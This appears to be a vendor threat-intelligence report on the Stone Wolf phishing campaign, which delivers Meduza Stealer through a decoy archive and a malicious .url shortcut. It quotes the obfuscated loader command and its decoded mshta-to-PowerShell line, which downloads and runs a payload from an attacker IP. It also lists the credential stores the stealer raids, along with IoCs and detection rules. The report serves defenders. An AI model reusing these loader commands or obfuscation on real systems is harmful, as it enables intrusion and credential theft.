Stone Wolf employs Meduza Stealer to hack Russian companies
BI.ZONE Threat Intelligence reports an increase in criminal activity employing commercial malware available on underground resources. Recently, the researchers identified a malicious campaign by a cluster later dubbed Stone Wolf. The adversaries send out phishing emails on behalf of a legitimate provider of industrial automation solutions. The goal of the attackers is to deliver Meduza Stealer to the infrastructures of their interest.
Cybercriminals often disseminate phishing emails on behalf of large well‑known organizations. Recognizable logos and other elements of the brands’ visual identity help adversaries gain user trust and boost the chances for their malicious messages to be opened. It is important to remember that the brands cannot be liable for the actions of cybercriminals and associated damage.
- Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim. This fact underscores the importance of raising awareness of adversary methods.
- By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments. This tendency indicates the need for employees to undergo regular cybersecurity training.
- Attackers keep on expanding their arsenal of commercial malware. This once again highlights the importance of monitoring underground resources.
The adversaries disseminate an archive named Dostavka_Promautomatic.zip
. The archive contains:
- a
.p7s
digital signature file - a
.docx
legitimate document used as a decoy Scan_127-05_24_dostavka_13.05.2024.pdf.url
, a malicious link to Meduza Stealer
Opening the malicious link triggers the loading and execution of a file hosted on a remote SMB server.
The file is a Windows shortcut that runs the following command:
SyncAppvPublishingServer.vbs
;520,526,515,527,508,443,515,527,527,523,469,458,458,460,468,462,457,460,461,463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,508,521,506,460,461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,506,460,462,457,459,464,457,461,459,461,463,457,512,531,512|%{$p+=[char]($_-411)};$p | powershell –
Performing the subtraction operation transforms the command as follows:
SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -
The command downloads an HTA file named Scan_127-05_24_dostavka_13.05.2024.exe
from a remote network location, executes the file with the help of MSHTA, and runs the command through the PowerShell interpreter. The command runs via WScript.Shell.Run([command])
and contains an AES‑encrypted payload for the PowerShell interpreter. The payload is decrypted at runtime and executed.
The decrypted script does the following:
- downloads the document from the remote network server
http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdf
and runs it - downloads In2al5d P3in4er from the network server
http://193.124.33[.]71:3217/scp231.exe
and runs it
The files are saved into the folder C:\Users\[user]\Appdata\Roaming
. Then the script searches for the file Scan_127-05_24_dostavka_13.05.2024.pdf.url
and replaces it with the downloaded PDF file.
In2al5d P3in4er is used for downloading and running Meduza Stealer. This malware as a service first appeared on underground resources in June 2023. One‑month, three‑month, and lifetime subscriptions can be purchased for $199, $399, and $1,199, respectively. In March 2024, additional options became available, including the loader (presumably, In2al5d P3in4er) and a dedicated server with а range of variables (the number of cores, size of RAM, and amount of disk space).
Purchasers receive a builder and a web panel that enables them to monitor data collected from victim devices. According to the Meduza Stealer developers, the executable file contains an anti‑CIS module which restricts attacks in the region. However, there is no such restriction in the malware sample obtained by the BI.ZONE Threat Intelligence team.
If the malware cannot connect to the C2 server, the program terminates.
In the compromised system, the stealer retrieves data on the operating system version, device name and time zone, RAM capacity, processor, graphic adapter, screen resolution (with a screen snapshot), as well as the device’s public IP address by sending a query to https://api.ipify[.]org
.
The stealer also collects the following data:
- account credentials saved in Outlook
- account credentials from browsers (Chrome, Edge, Comodo, Atom, Yandex, etc.)
- account credentials from crypto wallets (Coinomi, Exodus, Ethereum, etc.)
- list of installed applications by accessing the registry hive
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
- Telegram and Steam sessions, a Discord token
- account credentials from password managers (1Password, GAuth, NordPass, etc.)
- Windows Credential Manager and Windows Vault data retrieved via WinAPI functions (
VaultEnumerateVaults
,VaultOpenVault
) - list of active processes retrieved via WinAPI functions (
CreateToolhelp32Snapshot
,Process32FirstW
,Process32NextW
)
The collected data is sent to the control server via TCP.
cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0
864cbc0ec0418da6bb14d95713994eb0f38be289c3c7883bde51a9f1408d06bb
af2386431856e1b8e41a0f94210c42919498250506fffde57886b1e3e6b1f0f4
dd38bf69a941ef4637f874016eccab7907499e7afddf06ed0bd7f6a942931d9f
095b37644804d322ca470d91345ba784dad15c8f1f5a6df20ee7630abcf013f7
51d01bc7e689dd5aa78c622b0e53d979a6c1cab7b74d61b61c6d014680ade469
46a83fa47ebb0a533223ebd988c8a5408e7f9a861d4d9fd1addbe1bad6c41ea0
8e99941fc79650581787813b87334cfcd17ac30839483a42b553cdbae49bc76f
0414447d166298fd10bbe5d1ea60462fb24cb0a4256df988d50246f5b0b4d284
c2e0e3b7bfd21f5c6b32b21a3137004f3ddb43cc5613fe1a7245473c45ce529a
ed2a5e3ce5bb91db9641975229318e5901a62b9e1b73a6f0ba15c15acb2049c5
35171edb79c9beda0462e6541d5a4da3b8ee7d8c06fca20e7cd4621e60de50b8
989638e5c290c38eecf8849607d9107f3d69a38d3babb67c77382e2f3376d700
30f822cbc92ec6f492c5b76291a921214ac65e5b81c3bc2f545d576e1dd15635
ac836822fc7f214d6e090a2bc5d1a4839903438d036bd4da5c1729dca2d882f1
d05158ad6e03aeaf6a677d049d0f11c2a86eb8768748fc37ee6844009dec5c01
de50fa9a097b0422fe22031f46402cf045efff32daf384fa89b6aca6061551e5
3b4810fb9a74764797c66226478ca54af5b7f14c0fb78fa711cb87eb11c8ed7f
32c4baf3c05a9d48a328de6d78f4e8d62caa453045ac99aaf35cbb2273e461bc
9a951be6b17f713c9866e17aa71d9e1c4615540b9851a956a23b8fe9dee7c2dd
bb4a085012ecc82932da446a9a30f398fcba1ba7df7d9d6f7076294301ea1b69
1e15ea86c8ea6c0d6db8241423b7d731cf2dd398c69ef16e9bfe29e32d7fd8ac
be599e8e9605e02e0f6c284ece747fa393acb3b2e952f12b3ca7380264831116
05f55da61ab7a5e71b45b6884882024ea8135921dca7ae9017ba5e14b647a4f9
9afbfde2dd0137e872ef20a6454776f5f896d03053327070fadf25c7831cddb0
01ec9c59da49bbf4bed1308e20775bab4c7558857677a678c4210d0cd4be6663
ac97c5cbb2f0044d61a793d2cebe33411ecf59e2613b615663e680b28c92ddd7
e657014bb108f4779325b34a02a06bbc7d3cbbdb324747afec51d0a2441925be
486a970731749d2839cb8757e8e6136d80747c59c6145e8197aba1a0fb305386
ca84635d1fc251238a9379c08f3384f43274a653d01bf4bad4c810a71a679de5
4927db80c34f1e8c9b2bd5efa6f0f4c3c8fb5cfda31535841b6bd539360e19c7
1ba9d880e4b532ea375242878c2a18b99875d8922657caa813e5bfaf4094f252
362c1b9e5d46a866a52f03dca80aa812d5637a8d2304527603445f78e79b855c
26a234763f42527860fc45c04b377b78fa21a9803709e248f6c0d56ba42dd15c
c392f55e79e3ca4b88a3a15dcff255edb80ca44e82a758f9ea53a2cc12525d47
cee2442ce10695e29830a77d38d4af1e24d6881203743664abc4ad9a8c97c0f2
193.124.33[.]71
109.120.177[.]48
Tactic | Technique | Procedure |
---|---|---|
Initial Access |
Phishing: Spearphishing Attachment |
Uses phishing emails with malicious attachments to gain initial access |
Execution |
User Execution: Malicious File |
Prompts the victim to run the malicious file to initiate the compromise process |
Command and Scripting Interpreter: PowerShell |
Employs PowerShell to run commands and scripts |
|
Command and Scripting Interpreter: Visual Basic |
Employs VBScript to run commands and scripts |
|
Defense Evasion |
Deobfuscate/Decode Files or Information |
Deobfuscates the commands and scripts being launched |
Impersonation |
Sends out phishing emails on behalf of a real organization |
|
Masquerading: Double File Extension |
Uses double extension to masquerade the malicious file |
|
System Binary Proxy Execution: Mshta |
Uses MSHTA to run malicious files |
|
Credential Access |
Credentials from Password Stores: Credentials from Web Browsers |
Retrieves authentication data from web browsers |
Credentials from Password Stores: Windows Credential Manager |
Retrieves authentication data from Windows Credential Manager |
|
Credentials from Password Stores: Password Managers |
Retrieves authentication data from password managers |
|
Unsecured Credentials: Credentials In Files |
Retrieves authentication data from files |
|
Unsecured Credentials: Credentials in Registry |
Retrieves authentication data from the registry |
|
Discovery |
Process Discovery |
Collects information about the running processes |
System Information Discovery |
Collects information about the compromised system |
|
Command and Control |
Non-Application Layer Protocol |
Uses TCP to communicate with the C2 server |
Ingress Tool Transfer |
Transfers the malware to the compromised system |
|
Exfiltration |
Automated Exfiltration |
Automatically exfiltrates the collected data |
Exfiltration Over C2 Channel |
Transfers the collected data to the C2 sever |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
win_execution_or_open_file_with_double_extension
win_use_mshta_to_run_hta_from_url
win_access_to_ip_detection_service
win_possible_browser_stealer_activity
win_suspicious_access_to_password_manager_files
Adversaries can bypass preventive security solutions and penetrate the infrastructure unnoticed. It is crucial to neutralize threats before they cause significant damage to business. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices; for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.
To stay ahead of threat actors, you need to be aware of the methods they use when attacking various infrastructures. Understanding the real threat landscape is a massive advantage against adversity. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.